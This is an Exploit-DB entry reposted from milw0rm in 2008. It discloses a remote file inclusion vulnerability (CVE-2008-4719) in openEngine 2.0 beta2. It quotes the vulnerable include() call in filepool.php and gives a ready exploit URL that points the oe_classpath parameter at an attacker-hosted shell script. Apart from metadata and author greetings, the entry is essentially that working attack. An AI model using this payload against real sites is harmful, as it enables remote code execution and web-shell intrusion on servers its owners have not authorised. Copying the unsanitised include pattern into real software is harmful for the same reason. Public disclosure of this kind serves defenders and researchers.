openEngine 2.0 beta2 - Remote File Inclusion

Author: Crackers_Child
type: webapps
platform: php
port: 
date_added: 2008-09-25  
date_updated: 2016-12-23  
verified: 1  
codes: OSVDB-49303;CVE-2008-4719  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comopenengine20_beta2.zip  

raw file: 6585.txt  
**************************************************************************************

Author : By Crackers_Child
Contact: cashr00t@hotmail.com
Greetz : str0ke & All My Friends

**************************************************************************************
Script   : openEngine 2. 0 beta2 Remote File include Vulnerable
Download :http://downloads.sourceforge.net/openengine/openengine20_beta2.zip?modtime=1203083918&big_mirror=0

**************************************************************************************

Exploit : Site.com/script_path/cms/classes/openengine/filepool.php?oe_classpath=Shellz?


**************************************************************************************

Vulberable : include($oe_classpath."/openengine/thumbnail.php"); (filepool.php)


**************************************************************************************

N0te : Mubarek Ramazan Bayraminiz Kutlu Olsun Ey Musluman Halki :)
**************************************************************************************

# milw0rm.com [2008-09-26]